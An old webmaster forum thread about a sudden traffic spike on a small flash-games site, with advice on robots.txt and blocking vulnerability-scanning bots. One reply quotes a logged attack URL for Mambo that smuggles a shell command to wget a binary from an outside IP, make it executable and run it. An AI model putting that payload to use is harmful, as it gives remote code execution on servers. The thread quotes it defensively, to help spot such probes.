Sudden unexplained increase in traffic.

Forum Moderators: phranque

Message Too Old, No Replies

Sudden unexplained increase in traffic.

Fall

9:28 pm on Feb 23, 2006 (gmt 0)

Hi,

I run a very new flash games website (own games). I only have 3 games at the moment, but my traffic had been increasing steadily to about 1000 visitors a day for the last couple of days. A few hours ago, I only had about 400 visitors for today, but now i'm at almost 4000 - without any content updates in the last week...
I do have links from a few other sites, but my referer stats don't show anything that could explain this.
Do I have to worry that my site is under attack, or do these things happen?

Fall

9:31 pm on Feb 23, 2006 (gmt 0)

Ok, just found this in my stats (awstats) :
Unknown robot (identified by 'spider') 2043 27.04 MB 23 Feb 2006 - 22:25

So how do I stop it from doing this?

Demaestro

11:09 pm on Feb 23, 2006 (gmt 0)

You can hope that it follows robots.txt protocol.

you can get robots.txt disallow sytax from here:

[robotstxt.org...]

If that doesn't work try blocking that IP in Apache or whatever you are using to serve up your pages.

Fall

11:28 pm on Feb 23, 2006 (gmt 0)

Thanks, but if I disallow robots, my site won't get crawled by google etc right?
And also, if this is one robot doing it, would it count as different unique visitors in awstats? If it uses the same ip, doesn't it see it as one visitor?
I can't even see it's ip in awstats.
I'm a bit puzzled here...

Demaestro

11:54 pm on Feb 23, 2006 (gmt 0)

Well you don't have to disallow all robots. You do need the name of the bot you want to block. I was just looking at your orig post and realized you didn't have the name of the offending bot. If you had it's name you could just block it in the robots.txt.

It may be that some bot that is looking for web vulnerablities has been let loose on your site. You get any 404 not founds for URL that look like this?

/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo

or this

/cvs/mambo/index2.php?_REQUEST[option..blah..blah..blah

or this

/cal/tools/send_reminders.php

/phpmyadmin

These are just a few of bot attempts looking for PHP security holes. There are a few that will try to run an admin script on awstats as well which I notice you have.

I deal with about 10,000 of these hits a month. I just block their IPs. It is usually an infected box doing someone else's bidding.

Also you can look for 'put' requests or 'lock' or 'head' these all all webdav type calls trying to update content of the page.

Good Luck

Fall

12:27 am on Feb 24, 2006 (gmt 0)

Thanks for your reply.

Most of the 404 requests are things I recognize - typos I did when adding new features to the site. Nothing suspicious there.

I don't really know the ip of the bot. I noticed another weird thing, in my country list, I have a lot of hits with an "Unknown" country.

But I read this in awstats : "Robots shown here gave hits or traffic 'not viewed' by visitors, so they are not included in other charts."

So I guess the unknown spider-bot shouldn't be causing my traffic increase.

Anyway, I made a ticket at my web hosting company, so I hope they will have a look soon.